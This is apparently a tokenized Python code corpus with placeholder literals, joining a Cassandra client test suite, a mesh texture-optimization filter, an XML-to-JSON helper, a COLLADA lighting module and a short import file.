get ( key , column_start = '<STR_LIT:b>' , column_reversed = True ) , { '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:a>' : '<STR_LIT>' } ) <EOL> def test_insert_get_column_count ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' , '<STR_LIT:d>' : '<STR_LIT>' } <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , columns ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> assert_equal ( test_cf . get ( key , column_count = <NUM_LIT:3> ) , { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } ) <EOL> def test_insert_get_default_column_count ( self ) : <EOL> keys = [ str ( i ) for i in range ( <NUM_LIT:1000> ) ] <EOL> keys . sort ( ) <EOL> keys_and_values = [ ( key , key ) for key in keys ] <EOL> key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> test_cf . insert ( key , dict ( key_value for key_value in keys_and_values ) ) <EOL> assert_equal ( test_cf . get ( key ) , dict ( [ key_value for key_value in keys_and_values ] [ : <NUM_LIT:100> ] ) ) <EOL> def test_insert_multiget ( self ) : <EOL> key1 = '<STR_LIT>' <EOL> columns1 = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> key2 = '<STR_LIT>' <EOL> columns2 = { '<STR_LIT:3>' : '<STR_LIT>' , '<STR_LIT:4>' : '<STR_LIT>' } <EOL> missing_key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> test_cf . insert ( key1 , columns1 ) <EOL> test_cf . insert ( key2 , columns2 ) <EOL> rows = test_cf . 
multiget ( [ key1 , key2 , missing_key ] ) <EOL> assert_equal ( len ( rows ) , <NUM_LIT:2> ) <EOL> assert_equal ( rows [ key1 ] , columns1 ) <EOL> assert_equal ( rows [ key2 ] , columns2 ) <EOL> assert_true ( missing_key not in rows ) <EOL> def test_insert_multiget_column_start_and_finish ( self ) : <EOL> key1 = '<STR_LIT>' <EOL> columns1 = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> key2 = '<STR_LIT>' <EOL> columns2 = { '<STR_LIT:3>' : '<STR_LIT>' , '<STR_LIT:4>' : '<STR_LIT>' } <EOL> missing_key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> test_cf . insert ( key1 , columns1 ) <EOL> test_cf . insert ( key2 , columns2 ) <EOL> rows = test_cf . multiget ( [ key1 , key2 , missing_key ] , column_start = '<STR_LIT:2>' , column_finish = '<STR_LIT:3>' ) <EOL> assert_equal ( len ( rows ) , <NUM_LIT:2> ) <EOL> assert_equal ( rows [ key1 ] , { '<STR_LIT:2>' : '<STR_LIT>' } ) <EOL> assert_equal ( rows [ key2 ] , { '<STR_LIT:3>' : '<STR_LIT>' } ) <EOL> assert_true ( missing_key not in rows ) <EOL> def test_insert_multiget_column_finish_and_reversed ( self ) : <EOL> key1 = '<STR_LIT>' <EOL> columns1 = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:3>' : '<STR_LIT>' } <EOL> key2 = '<STR_LIT>' <EOL> columns2 = { '<STR_LIT:5>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> missing_key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> test_cf . insert ( key1 , columns1 ) <EOL> test_cf . insert ( key2 , columns2 ) <EOL> rows = test_cf . 
multiget ( [ key1 , key2 , missing_key ] , column_finish = '<STR_LIT:3>' , column_reversed = True ) <EOL> assert_equal ( len ( rows ) , <NUM_LIT:2> ) <EOL> assert_equal ( rows [ key1 ] , { '<STR_LIT:3>' : '<STR_LIT>' } ) <EOL> assert_equal ( rows [ key2 ] , { '<STR_LIT:5>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert_true ( missing_key not in rows ) <EOL> def test_insert_multiget_column_start_column_count ( self ) : <EOL> key1 = '<STR_LIT>' <EOL> columns1 = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> key2 = '<STR_LIT>' <EOL> columns2 = { '<STR_LIT:3>' : '<STR_LIT>' , '<STR_LIT:4>' : '<STR_LIT>' } <EOL> missing_key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> test_cf . insert ( key1 , columns1 ) <EOL> test_cf . insert ( key2 , columns2 ) <EOL> rows = test_cf . multiget ( [ key1 , key2 , missing_key ] , column_count = <NUM_LIT:1> , column_start = '<STR_LIT:2>' ) <EOL> assert_equal ( len ( rows ) , <NUM_LIT:2> ) <EOL> assert_equal ( rows [ key1 ] , { '<STR_LIT:2>' : '<STR_LIT>' } ) <EOL> assert_equal ( rows [ key2 ] , { '<STR_LIT:3>' : '<STR_LIT>' } ) <EOL> assert_true ( missing_key not in rows ) <EOL> def test_insert_multiget_default_column_count ( self ) : <EOL> keys = [ str ( i ) for i in range ( <NUM_LIT:1000> ) ] <EOL> keys . sort ( ) <EOL> keys_and_values = [ ( key , key ) for key in keys ] <EOL> key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> test_cf . insert ( key , dict ( key_value for key_value in keys_and_values ) ) <EOL> rows = test_cf . multiget ( [ key ] ) <EOL> assert_equal ( len ( rows ) , <NUM_LIT:1> ) <EOL> assert_equal ( rows [ key ] , dict ( [ key_value for key_value in keys_and_values ] [ : <NUM_LIT:100> ] ) ) <EOL> def insert_insert_get_indexed_slices ( self ) : <EOL> columns = { '<STR_LIT>' : <NUM_LIT:1> L } <EOL> keys = set ( ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:4> ) : <EOL> indexed_cf . insert ( '<STR_LIT>' % i , columns ) <EOL> indexed_cf_stub . 
insert ( '<STR_LIT>' % i , columns ) <EOL> keys . add ( '<STR_LIT>' % i ) <EOL> expr = index . create_index_expression ( column_name = '<STR_LIT>' , value = <NUM_LIT:1> L ) <EOL> clause = index . create_index_clause ( [ expr ] ) <EOL> for test_indexed_cf in ( indexed_cf , indexed_cf_stub ) : <EOL> count = <NUM_LIT:0> <EOL> for key , cols in test_indexed_cf . get_indexed_slices ( clause ) : <EOL> assert_equal ( cols , columns ) <EOL> assert key in keys <EOL> count += <NUM_LIT:1> <EOL> assert_equal ( count , <NUM_LIT:3> ) <EOL> def test_remove ( self ) : <EOL> key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> columns = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> test_cf . insert ( key , columns ) <EOL> test_cf . remove ( key , columns = [ ] ) <EOL> assert_equal ( test_cf . get ( key ) , columns ) <EOL> test_cf . remove ( key , columns = [ '<STR_LIT:2>' ] ) <EOL> del columns [ '<STR_LIT:2>' ] <EOL> assert_equal ( test_cf . get ( key ) , { '<STR_LIT:1>' : '<STR_LIT>' } ) <EOL> test_cf . remove ( key ) <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> def test_insert_get_tuuids ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = ( ( convert_time_to_uuid ( time . time ( ) - <NUM_LIT:1000> , randomize = True ) , '<STR_LIT>' ) , <EOL> ( convert_time_to_uuid ( time . time ( ) , randomize = True ) , '<STR_LIT>' ) ) <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , dict ( columns ) ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> assert_equal ( test_cf . get ( key ) . keys ( ) , [ x [ <NUM_LIT:0> ] for x in columns ] ) </s>
<s> from meshtool . filters . base_filters import OptimizationFilter <EOL> from meshtool . util import Image <EOL> import sys <EOL> from StringIO import StringIO <EOL> import numpy <EOL> def optimizeTextures ( mesh ) : <EOL> previous_images = [ ] <EOL> for cimg in mesh . images : <EOL> previous_images . append ( cimg . path ) <EOL> pilimg = cimg . pilimage <EOL> if pilimg is None : <EOL> imgdata = cimg . data <EOL> if imgdata is None : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> continue <EOL> try : <EOL> from panda3d . core import Texture <EOL> from panda3d . core import StringStream <EOL> from panda3d . core import PNMImage <EOL> except ImportError : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> continue <EOL> t = Texture ( ) <EOL> success = t . readDds ( StringStream ( imgdata ) ) <EOL> if success == <NUM_LIT:0> : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> continue <EOL> outdata = t . getRamImageAs ( '<STR_LIT>' ) . getData ( ) <EOL> try : <EOL> im = Image . fromstring ( '<STR_LIT>' , ( t . getXSize ( ) , t . getYSize ( ) ) , outdata ) <EOL> im . load ( ) <EOL> except IOError : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> continue <EOL> pilimg = im <EOL> if pilimg . format == '<STR_LIT>' : <EOL> continue <EOL> if '<STR_LIT:A>' in pilimg . getbands ( ) : <EOL> alpha = numpy . array ( pilimg . split ( ) [ - <NUM_LIT:1> ] . getdata ( ) ) <EOL> if not numpy . any ( alpha < <NUM_LIT:255> ) : <EOL> alpha = None <EOL> pilimg = pilimg . convert ( '<STR_LIT>' ) <EOL> if '<STR_LIT:A>' in pilimg . getbands ( ) : <EOL> output_format = '<STR_LIT>' <EOL> output_extension = '<STR_LIT>' <EOL> output_options = { '<STR_LIT>' : True } <EOL> else : <EOL> if pilimg . format != '<STR_LIT>' : <EOL> pilimg = pilimg . convert ( "<STR_LIT>" ) <EOL> output_format = '<STR_LIT>' <EOL> output_extension = '<STR_LIT>' <EOL> output_options = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : True } <EOL> if cimg . path . 
lower ( ) [ - len ( output_extension ) : ] != output_extension : <EOL> dot = cimg . path . rfind ( '<STR_LIT:.>' ) <EOL> before_ext = cimg . path [ <NUM_LIT:0> : dot ] if dot != - <NUM_LIT:1> else cimg . path <EOL> while before_ext + output_extension in previous_images : <EOL> before_ext = before_ext + '<STR_LIT>' <EOL> cimg . path = before_ext + output_extension <EOL> previous_images . append ( cimg . path ) <EOL> outbuf = StringIO ( ) <EOL> try : <EOL> pilimg . save ( outbuf , output_format , ** output_options ) <EOL> except IOError , ex : <EOL> print ex <EOL> cimg . data = outbuf . getvalue ( ) <EOL> def FilterGenerator ( ) : <EOL> class OptimizeTexturesFilter ( OptimizationFilter ) : <EOL> def __init__ ( self ) : <EOL> super ( OptimizeTexturesFilter , self ) . __init__ ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def apply ( self , mesh ) : <EOL> optimizeTextures ( mesh ) <EOL> return mesh <EOL> return OptimizeTexturesFilter ( ) <EOL> from meshtool . filters import factory <EOL> factory . register ( FilterGenerator ( ) . name , FilterGenerator ) </s>
<s> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> from itertools import groupby <EOL> def bare_tag ( elem ) : <EOL> return elem . tag . rsplit ( '<STR_LIT:}>' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] <EOL> def to_pod ( xml ) : <EOL> properties = { } <EOL> if xml . text is not None : <EOL> properties [ '<STR_LIT:$>' ] = xml . text <EOL> for ( key , val ) in xml . attrib . iteritems ( ) : <EOL> properties [ '<STR_LIT:@>' + key ] = val <EOL> sorted_children = sorted ( [ ( bare_tag ( e ) , e ) for e in xml ] ) <EOL> for key , group in groupby ( sorted_children , key = lambda t : t [ <NUM_LIT:0> ] ) : <EOL> grouped_elements = list ( group ) <EOL> if len ( grouped_elements ) > <NUM_LIT:1> : <EOL> properties [ key ] = [ to_pod ( e ) for k , e in grouped_elements ] <EOL> else : <EOL> properties [ key ] = to_pod ( grouped_elements [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> return properties <EOL> def to_json ( xml , ** kargs ) : <EOL> return json . JSONEncoder ( ** kargs ) . encode ( { bare_tag ( xml ) : to_pod ( xml ) } ) </s>
<s> """<STR_LIT>""" <EOL> import numpy <EOL> from collada . common import DaeObject , E , tag <EOL> from collada . common import DaeIncompleteError , DaeBrokenRefError , DaeMalformedError , DaeUnsupportedError <EOL> from collada . util import _correctValInNode <EOL> from collada . xmlutil import etree as ElementTree <EOL> class Light ( DaeObject ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def load ( collada , localscope , node ) : <EOL> tecnode = node . find ( tag ( '<STR_LIT>' ) ) <EOL> if tecnode is None or len ( tecnode ) == <NUM_LIT:0> : <EOL> raise DaeIncompleteError ( '<STR_LIT>' ) <EOL> lightnode = tecnode [ <NUM_LIT:0> ] <EOL> if lightnode . tag == tag ( '<STR_LIT>' ) : <EOL> return DirectionalLight . load ( collada , localscope , node ) <EOL> elif lightnode . tag == tag ( '<STR_LIT>' ) : <EOL> return PointLight . load ( collada , localscope , node ) <EOL> elif lightnode . tag == tag ( '<STR_LIT>' ) : <EOL> return AmbientLight . load ( collada , localscope , node ) <EOL> elif lightnode . tag == tag ( '<STR_LIT>' ) : <EOL> return SpotLight . load ( collada , localscope , node ) <EOL> else : <EOL> raise DaeUnsupportedError ( '<STR_LIT>' % lightnode . tag ) <EOL> class DirectionalLight ( Light ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id , color , xmlnode = None ) : <EOL> """<STR_LIT>""" <EOL> self . id = id <EOL> """<STR_LIT>""" <EOL> self . direction = numpy . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:1> ] , dtype = numpy . float32 ) <EOL> self . color = color <EOL> """<STR_LIT>""" <EOL> if xmlnode != None : <EOL> self . xmlnode = xmlnode <EOL> """<STR_LIT>""" <EOL> else : <EOL> self . xmlnode = E . light ( <EOL> E . technique_common ( <EOL> E . directional ( <EOL> E . color ( '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) ) <EOL> ) <EOL> ) <EOL> , id = self . id , name = self . id ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> self . xmlnode . set ( '<STR_LIT:id>' , self . id ) <EOL> self . xmlnode . 
set ( '<STR_LIT:name>' , self . id ) <EOL> colornode = self . xmlnode . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , <EOL> tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode . text = '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) <EOL> @ staticmethod <EOL> def load ( collada , localscope , node ) : <EOL> colornode = node . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) , <EOL> tag ( '<STR_LIT>' ) ) ) <EOL> if colornode is None : <EOL> raise DaeIncompleteError ( '<STR_LIT>' ) <EOL> try : <EOL> color = tuple ( [ float ( v ) for v in colornode . text . split ( ) ] ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> return DirectionalLight ( node . get ( '<STR_LIT:id>' ) , color , xmlnode = node ) <EOL> def bind ( self , matrix ) : <EOL> """<STR_LIT>""" <EOL> return BoundDirectionalLight ( self , matrix ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . id , ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class AmbientLight ( Light ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id , color , xmlnode = None ) : <EOL> """<STR_LIT>""" <EOL> self . id = id <EOL> """<STR_LIT>""" <EOL> self . color = color <EOL> """<STR_LIT>""" <EOL> if xmlnode != None : <EOL> self . xmlnode = xmlnode <EOL> """<STR_LIT>""" <EOL> else : <EOL> self . xmlnode = E . light ( <EOL> E . technique_common ( <EOL> E . ambient ( <EOL> E . color ( '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) ) <EOL> ) <EOL> ) <EOL> , id = self . id , name = self . id ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> self . xmlnode . set ( '<STR_LIT:id>' , self . id ) <EOL> self . xmlnode . set ( '<STR_LIT:name>' , self . id ) <EOL> colornode = self . xmlnode . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , <EOL> tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode . text = '<STR_LIT:U+0020>' . join ( map ( str , self . 
color ) ) <EOL> @ staticmethod <EOL> def load ( collada , localscope , node ) : <EOL> colornode = node . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , <EOL> tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> if colornode is None : <EOL> raise DaeIncompleteError ( '<STR_LIT>' ) <EOL> try : <EOL> color = tuple ( [ float ( v ) for v in colornode . text . split ( ) ] ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> return AmbientLight ( node . get ( '<STR_LIT:id>' ) , color , xmlnode = node ) <EOL> def bind ( self , matrix ) : <EOL> """<STR_LIT>""" <EOL> return BoundAmbientLight ( self , matrix ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . id , ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class PointLight ( Light ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id , color , constant_att = None , linear_att = None , <EOL> quad_att = None , zfar = None , xmlnode = None ) : <EOL> """<STR_LIT>""" <EOL> self . id = id <EOL> """<STR_LIT>""" <EOL> self . position = numpy . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , dtype = numpy . float32 ) <EOL> self . color = color <EOL> """<STR_LIT>""" <EOL> self . constant_att = constant_att <EOL> """<STR_LIT>""" <EOL> self . linear_att = linear_att <EOL> """<STR_LIT>""" <EOL> self . quad_att = quad_att <EOL> """<STR_LIT>""" <EOL> self . zfar = zfar <EOL> """<STR_LIT>""" <EOL> if xmlnode != None : <EOL> self . xmlnode = xmlnode <EOL> """<STR_LIT>""" <EOL> else : <EOL> pnode = E . point ( <EOL> E . color ( '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) ) <EOL> ) <EOL> if self . constant_att is not None : <EOL> pnode . append ( E . constant_attenuation ( str ( self . constant_att ) ) ) <EOL> if self . linear_att is not None : <EOL> pnode . append ( E . linear_attenuation ( str ( self . linear_att ) ) ) <EOL> if self . quad_att is not None : <EOL> pnode . append ( E . quadratic_attenuation ( str ( self . quad_att ) ) ) <EOL> if self . 
zfar is not None : <EOL> pnode . append ( E . zfar ( str ( self . zvar ) ) ) <EOL> self . xmlnode = E . light ( <EOL> E . technique_common ( pnode ) <EOL> , id = self . id , name = self . id ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> self . xmlnode . set ( '<STR_LIT:id>' , self . id ) <EOL> self . xmlnode . set ( '<STR_LIT:name>' , self . id ) <EOL> pnode = self . xmlnode . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> colornode . text = '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . constant_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . linear_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . quad_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . zfar ) <EOL> @ staticmethod <EOL> def load ( collada , localscope , node ) : <EOL> pnode = node . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> if colornode is None : <EOL> raise DaeIncompleteError ( '<STR_LIT>' ) <EOL> try : <EOL> color = tuple ( [ float ( v ) for v in colornode . text . split ( ) ] ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> constant_att = linear_att = quad_att = zfar = None <EOL> qattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> cattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> lattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> zfarnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> try : <EOL> if cattnode is not None : <EOL> constant_att = float ( cattnode . text ) <EOL> if lattnode is not None : <EOL> linear_att = float ( lattnode . text ) <EOL> if qattnode is not None : <EOL> quad_att = float ( qattnode . text ) <EOL> if zfarnode is not None : <EOL> zfar = float ( zfarnode . 
text ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> return PointLight ( node . get ( '<STR_LIT:id>' ) , color , constant_att , linear_att , <EOL> quad_att , zfar , xmlnode = node ) <EOL> def bind ( self , matrix ) : <EOL> """<STR_LIT>""" <EOL> return BoundPointLight ( self , matrix ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . id , ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class SpotLight ( Light ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id , color , constant_att = None , linear_att = None , <EOL> quad_att = None , falloff_ang = None , falloff_exp = None , xmlnode = None ) : <EOL> """<STR_LIT>""" <EOL> self . id = id <EOL> """<STR_LIT>""" <EOL> self . color = color <EOL> """<STR_LIT>""" <EOL> self . constant_att = constant_att <EOL> """<STR_LIT>""" <EOL> self . linear_att = linear_att <EOL> """<STR_LIT>""" <EOL> self . quad_att = quad_att <EOL> """<STR_LIT>""" <EOL> self . falloff_ang = falloff_ang <EOL> """<STR_LIT>""" <EOL> self . falloff_exp = falloff_exp <EOL> """<STR_LIT>""" <EOL> if xmlnode != None : <EOL> self . xmlnode = xmlnode <EOL> """<STR_LIT>""" <EOL> else : <EOL> pnode = E . spot ( <EOL> E . color ( '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) ) , <EOL> ) <EOL> if self . constant_att is not None : <EOL> pnode . append ( E . constant_attenuation ( str ( self . constant_att ) ) ) <EOL> if self . linear_att is not None : <EOL> pnode . append ( E . linear_attenuation ( str ( self . linear_att ) ) ) <EOL> if self . quad_att is not None : <EOL> pnode . append ( E . quadratic_attenuation ( str ( self . quad_att ) ) ) <EOL> if self . falloff_ang is not None : <EOL> pnode . append ( E . falloff_angle ( str ( self . falloff_ang ) ) ) <EOL> if self . falloff_exp is not None : <EOL> pnode . append ( E . falloff_exponent ( str ( self . falloff_exp ) ) ) <EOL> self . xmlnode = E . light ( <EOL> E . technique_common ( pnode ) <EOL> , id = self . 
id , name = self . id ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> self . xmlnode . set ( '<STR_LIT:id>' , self . id ) <EOL> self . xmlnode . set ( '<STR_LIT:name>' , self . id ) <EOL> pnode = self . xmlnode . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> colornode . text = '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . constant_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . linear_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . quad_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . falloff_ang ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . falloff_exp ) <EOL> @ staticmethod <EOL> def load ( collada , localscope , node ) : <EOL> pnode = node . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> if colornode is None : <EOL> raise DaeIncompleteError ( '<STR_LIT>' ) <EOL> try : <EOL> color = tuple ( [ float ( v ) for v in colornode . text . split ( ) ] ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> constant_att = linear_att = quad_att = falloff_ang = falloff_exp = None <EOL> cattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> lattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> qattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> fangnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> fexpnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> try : <EOL> if cattnode is not None : <EOL> constant_att = float ( cattnode . text ) <EOL> if lattnode is not None : <EOL> linear_att = float ( lattnode . text ) <EOL> if qattnode is not None : <EOL> quad_att = float ( qattnode . text ) <EOL> if fangnode is not None : <EOL> falloff_ang = float ( fangnode . text ) <EOL> if fexpnode is not None : <EOL> falloff_exp = float ( fexpnode . 
text ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> return SpotLight ( node . get ( '<STR_LIT:id>' ) , color , constant_att , linear_att , <EOL> quad_att , falloff_ang , falloff_exp , xmlnode = node ) <EOL> def bind ( self , matrix ) : <EOL> """<STR_LIT>""" <EOL> return BoundSpotLight ( self , matrix ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . id , ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class BoundLight ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class BoundPointLight ( BoundLight ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , plight , matrix ) : <EOL> self . position = numpy . dot ( matrix [ : <NUM_LIT:3> , : <NUM_LIT:3> ] , plight . position ) + matrix [ : <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> """<STR_LIT>""" <EOL> self . color = plight . color <EOL> """<STR_LIT>""" <EOL> self . constant_att = plight . constant_att <EOL> if self . constant_att is None : <EOL> self . constant_att = <NUM_LIT:1.0> <EOL> """<STR_LIT>""" <EOL> self . linear_att = plight . linear_att <EOL> if self . linear_att is None : <EOL> self . linear_att = <NUM_LIT:0.0> <EOL> """<STR_LIT>""" <EOL> self . quad_att = plight . quad_att <EOL> if self . quad_att is None : <EOL> self . quad_att = <NUM_LIT:0.0> <EOL> """<STR_LIT>""" <EOL> self . zfar = plight . zfar <EOL> """<STR_LIT>""" <EOL> self . original = plight <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % str ( self . original . id ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class BoundSpotLight ( BoundLight ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , slight , matrix ) : <EOL> self . position = matrix [ : <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> """<STR_LIT>""" <EOL> self . direction = - matrix [ : <NUM_LIT:3> , <NUM_LIT:2> ] <EOL> """<STR_LIT>""" <EOL> self . up = matrix [ : <NUM_LIT:3> , <NUM_LIT:1> ] <EOL> """<STR_LIT>""" <EOL> self . matrix = matrix <EOL> """<STR_LIT>""" <EOL> self . 
color = slight . color <EOL> """<STR_LIT>""" <EOL> self . constant_att = slight . constant_att <EOL> if self . constant_att is None : <EOL> self . constant_att = <NUM_LIT:1.0> <EOL> """<STR_LIT>""" <EOL> self . linear_att = slight . linear_att <EOL> if self . linear_att is None : <EOL> self . linear_att = <NUM_LIT:0.0> <EOL> """<STR_LIT>""" <EOL> self . quad_att = slight . quad_att <EOL> if self . quad_att is None : <EOL> self . quad_att = <NUM_LIT:0.0> <EOL> """<STR_LIT>""" <EOL> self . falloff_ang = slight . falloff_ang <EOL> if self . falloff_ang is None : <EOL> self . falloff_ang = <NUM_LIT> <EOL> """<STR_LIT>""" <EOL> self . falloff_exp = slight . falloff_exp <EOL> if self . falloff_exp is None : <EOL> self . falloff_exp = <NUM_LIT:0.0> <EOL> """<STR_LIT>""" <EOL> self . original = slight <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % str ( self . original . id ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class BoundDirectionalLight ( BoundLight ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dlight , matrix ) : <EOL> self . direction = numpy . dot ( matrix [ : <NUM_LIT:3> , : <NUM_LIT:3> ] , dlight . direction ) <EOL> """<STR_LIT>""" <EOL> self . color = dlight . color <EOL> """<STR_LIT>""" <EOL> self . original = dlight <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % str ( self . original . id ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class BoundAmbientLight ( BoundLight ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , alight , matrix ) : <EOL> self . color = alight . color <EOL> """<STR_LIT>""" <EOL> self . original = alight <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % str ( self . original . id ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) </s>
<s> import os <EOL> import sys <EOL> from GLSLRenderer import GLSLRenderer <EOL> from OldStyleRenderer import OldStyleRenderer </s>
